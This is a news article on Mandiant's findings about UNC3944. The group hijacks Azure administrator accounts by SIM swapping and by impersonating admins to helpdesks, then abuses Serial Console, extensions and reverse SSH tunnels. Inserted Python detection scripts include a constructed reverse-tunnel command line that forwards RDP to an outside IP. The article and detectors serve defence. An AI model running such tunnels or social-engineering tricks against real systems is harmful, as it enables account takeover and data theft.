Mandiant reports that a financially motivated threat group it tracks as “UNC3944” uses phishing and SIM swapping attacks to hijack Microsoft Azure administrator accounts and gain access to virtual machines.
From there, the attackers abuse the Azure Serial Console to install remote management software for persistence, and abuse Azure extensions for stealthy monitoring.
Mandiant reports that UNC3944 has been active since at least May 2022, and their campaign aims to steal data from victim organizations using Microsoft’s cloud computing service.
UNC3944 was previously credited with creating the STONESTOP (loader) and POORTRY (kernel-mode driver) toolkit for security software termination.
The threat actors used stolen Microsoft hardware developer accounts to sign those kernel drivers.
SIM swapping for Azure administrators
Initial access to the Azure administrator account is achieved with credentials stolen through SMS phishing, a technique UNC3944 commonly uses.
The attackers then impersonate the administrator when contacting the helpdesk agents to trick them into sending a multi-factor reset code via SMS to the target’s phone number.
However, the attacker has already SIM-swapped the administrator’s phone number onto a device they control, so they receive the 2FA code without the victim realizing the account has been hijacked.
Mandiant has not yet determined how the hackers perform the SIM swapping phase of their operations. However, previous cases have shown that knowing a target’s phone number and colluding with unscrupulous communications personnel is sufficient to facilitate illegal number ports.
Once attackers establish a foothold in the target organization’s Azure environment, they use their administrator privileges to collect information, modify existing Azure accounts as needed, or create new ones.
Living off the land tactics
In the next attack phase, UNC3944 uses Azure extensions to perform monitoring and intelligence gathering, disguising their malicious processes as seemingly harmless daily tasks, and blending them with regular activity.
Azure Extensions are “extra” features and services that can be integrated into the Azure Virtual Machine (VM) to help extend capabilities, automate tasks, and so on.
Because these extensions run inside the virtual machine and are normally used for legitimate purposes, their abuse is stealthy and draws less suspicion.
In this case, the threat actor misused Azure’s built-in diagnostic extensions such as “CollectGuestLogs”, which were leveraged to collect log files from the compromised endpoint. Additionally, Mandiant found evidence of the actor attempting to abuse the following additional extensions:
Hacking virtual machines to steal data
UNC3944 then uses the Azure Serial Console to obtain administrative console access to the virtual machines and run commands at the command prompt over the serial port.
“This attack method was unique in that it avoided many of the traditional detection methods used in Azure and gave the attacker full administrative access to the virtual machine,” the Mandiant report explains.
Mandiant noted that “whoami” is the first command the hackers execute, to determine which user is currently logged on and gather enough information to advance the intrusion.
More information on how to analyze Azure Serial Console logs can be found in the report’s supplement.
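The two signals the article describes on the Azure side, diagnostic-extension deployments such as CollectGuestLogs and Serial Console sessions that open with “whoami”, can be triaged from exported logs. The following script is an added example and is not code from the Mandiant report; the Activity Log field names (operationName, caller, resourceId), the two operation-name strings, and the Serial Console session line format are assumptions, and every sample record is constructed.

```python
"""Triage Azure signals described in the article: diagnostic-extension
deployments, Serial Console connections, and "whoami" as the first command
of a Serial Console session.

Added example (not from the Mandiant report). Activity Log field names,
operation names and the session log line format are assumptions; all
sample data is constructed."""
import json
import re

# Assumed Azure Activity Log operation names for the two actions of interest.
EXTENSION_WRITE = "Microsoft.Compute/virtualMachines/extensions/write"
SERIAL_CONSOLE_CONNECT = "Microsoft.SerialConsole/serialPorts/connect/action"

# Extension named in the report; add others your environment treats as unusual.
WATCHED_EXTENSIONS = {"CollectGuestLogs"}

# Placeholder resource id for a constructed VM.
VM01 = ("/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg1"
        "/providers/Microsoft.Compute/virtualMachines/vm01")

# Constructed Activity Log export, one JSON object per line.
SAMPLE_ACTIVITY_LOG = "\n".join(json.dumps(r) for r in [
    {"operationName": EXTENSION_WRITE, "caller": "admin@example.com",
     "resourceId": VM01 + "/extensions/CollectGuestLogs"},
    {"operationName": EXTENSION_WRITE, "caller": "ops@example.com",
     "resourceId": VM01 + "/extensions/ExampleMonitoringExtension"},
    {"operationName": SERIAL_CONSOLE_CONNECT, "caller": "admin@example.com",
     "resourceId": VM01},
    {"operationName": "Microsoft.Compute/virtualMachines/start/action",
     "caller": "ops@example.com", "resourceId": VM01},
])

# Constructed Serial Console transcript: "<timestamp> session=<id> cmd=<text>".
SAMPLE_SESSION_LOG = """\
2023-05-16T10:02:11Z session=s1 cmd=whoami
2023-05-16T10:02:20Z session=s1 cmd=net user
2023-05-16T10:05:00Z session=s2 cmd=dir C:\\
2023-05-16T10:05:09Z session=s2 cmd=whoami
"""

SESSION_LINE = re.compile(r"^(?P<ts>\S+) session=(?P<sid>\S+) cmd=(?P<cmd>.*)$")


def parse_activity_log(text):
    """Parse a newline-delimited JSON export into a list of dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_extension_writes(records):
    """Return (caller, extension name, resourceId) for each watched extension deployment."""
    hits = []
    for r in records:
        if r.get("operationName") != EXTENSION_WRITE:
            continue
        ext = r["resourceId"].rsplit("/extensions/", 1)[-1]
        if ext in WATCHED_EXTENSIONS:
            hits.append((r["caller"], ext, r["resourceId"]))
    return hits


def find_serial_console_connects(records):
    """Return (caller, resourceId) for every Serial Console connection."""
    return [(r["caller"], r["resourceId"]) for r in records
            if r.get("operationName") == SERIAL_CONSOLE_CONNECT]


def first_commands(session_log):
    """Map each session id to the first command typed in that session."""
    first = {}
    for line in session_log.splitlines():
        m = SESSION_LINE.match(line)
        if m and m["sid"] not in first:
            first[m["sid"]] = m["cmd"].strip()
    return first


def sessions_starting_with_whoami(session_log):
    """Session ids whose very first command is whoami, the pattern Mandiant noted."""
    out = []
    for sid, cmd in first_commands(session_log).items():
        words = cmd.lower().split()
        if words and words[0] == "whoami":
            out.append(sid)
    return sorted(out)


def triage(activity_text, session_log):
    """Combine the three checks into one report for an analyst."""
    records = parse_activity_log(activity_text)
    return {
        "extension_writes": find_extension_writes(records),
        "serial_console_connects": find_serial_console_connects(records),
        "whoami_first_sessions": sessions_starting_with_whoami(session_log),
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_ACTIVITY_LOG, SAMPLE_SESSION_LOG), indent=2))
```

On the constructed data this reports the CollectGuestLogs deployment and the Serial Console connection by the same caller, and session s1 as opening with whoami; session s2 runs whoami only as its second command and is not flagged, which is deliberate, since the article's observation is specifically about the first command.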
The threat actors then use PowerShell to establish persistence on the virtual machine and install several commercially available remote administration tools that the report does not name.
“To maintain a presence on a virtual machine, an attacker often deploys several commercially available remote administration tools via PowerShell,” the Mandiant report reads.
“The advantage of using these tools is that they are legitimately signed applications and provide the attacker with remote access without triggering alerts on many endpoint discovery platforms.”
The next step for UNC3944 is to create a reverse SSH tunnel to their C2 server, maintaining stealthy, persistent access over an encrypted channel that bypasses network restrictions and security controls.
The attacker configures the reverse tunnel with port forwarding, which provides a direct connection to the Azure VM via Remote Desktop. For example, any incoming connection to port 12345 on the remote machine is forwarded to localhost port 3389 (the Remote Desktop Protocol service port).
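The reverse tunnel described above leaves a recognisable trace in process telemetry: an ssh command line carrying a -R remote-forward spec whose local side is port 3389. The following detection is an added example, not part of the report; the command lines are constructed, and the -R parsing follows OpenSSH's documented [bind_address:]port:host:hostport form (bundled short options such as -NR are not handled).

```python
"""Flag reverse SSH tunnels that expose RDP (port 3389) from process command lines.

Added example, not from the Mandiant report. Sample command lines are
constructed; the -R syntax handled is OpenSSH's [bind_address:]port:host:hostport."""
import shlex

RDP_PORT = 3389

# Constructed process command lines as an EDR or Sysmon export might show them.
SAMPLE_CMDLINES = [
    "ssh.exe -N -R 12345:localhost:3389 tunnel@203.0.113.10",
    "ssh -R 0.0.0.0:2222:127.0.0.1:22 backup@198.51.100.5",
    "ssh -L 8080:localhost:80 dev@198.51.100.7",
    "powershell.exe -NoProfile -Command Get-Process",
]


def parse_remote_forwards(cmdline):
    """Return (remote_port, local_host, local_port) for each -R spec in an ssh command line."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] not in ("ssh", "ssh.exe"):
        return []
    forwards = []
    i = 1
    while i < len(argv):
        arg = argv[i]
        spec = None
        if arg == "-R" and i + 1 < len(argv):      # "-R spec"
            spec = argv[i + 1]
            i += 1
        elif arg.startswith("-R") and len(arg) > 2:  # "-Rspec"
            spec = arg[2:]
        i += 1
        if spec is None:
            continue
        parts = spec.split(":")
        if len(parts) == 3:
            rport, lhost, lport = parts
        elif len(parts) == 4:
            _bind, rport, lhost, lport = parts
        else:
            continue  # socket-path and other forms are out of scope here
        try:
            forwards.append((int(rport), lhost, int(lport)))
        except ValueError:
            continue
    return forwards


def flag_rdp_tunnels(cmdlines):
    """Findings for every remote forward whose local target is the RDP port."""
    findings = []
    for c in cmdlines:
        for rport, lhost, lport in parse_remote_forwards(c):
            if lport == RDP_PORT:
                findings.append({"cmdline": c, "remote_port": rport,
                                 "local_target": f"{lhost}:{lport}"})
    return findings


if __name__ == "__main__":
    for f in flag_rdp_tunnels(SAMPLE_CMDLINES):
        print(f)
```

Only the first constructed line is flagged: the second is a remote forward to SSH rather than RDP, the third is a local (-L) forward, and the fourth is not ssh at all. In practice the same parser can be pointed at any other local port an organisation considers sensitive.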
Finally, the attackers use the credentials of the compromised user account to log into the compromised Azure VM via the reverse shell and only then proceed to expand their control within the compromised environment, stealing data along the way.
The attack presented by Mandiant demonstrates UNC3944’s deep understanding of the Azure environment and how they can take advantage of the built-in tools to avoid detection.
When this know-how is combined with high-level social engineering skills that help attackers perform SIM swaps, the stakes are magnified.
At the same time, a limited understanding of cloud technologies leads organizations to deploy insufficient security measures, such as SMS-based multi-factor authentication, which creates opportunities for sophisticated threat actors.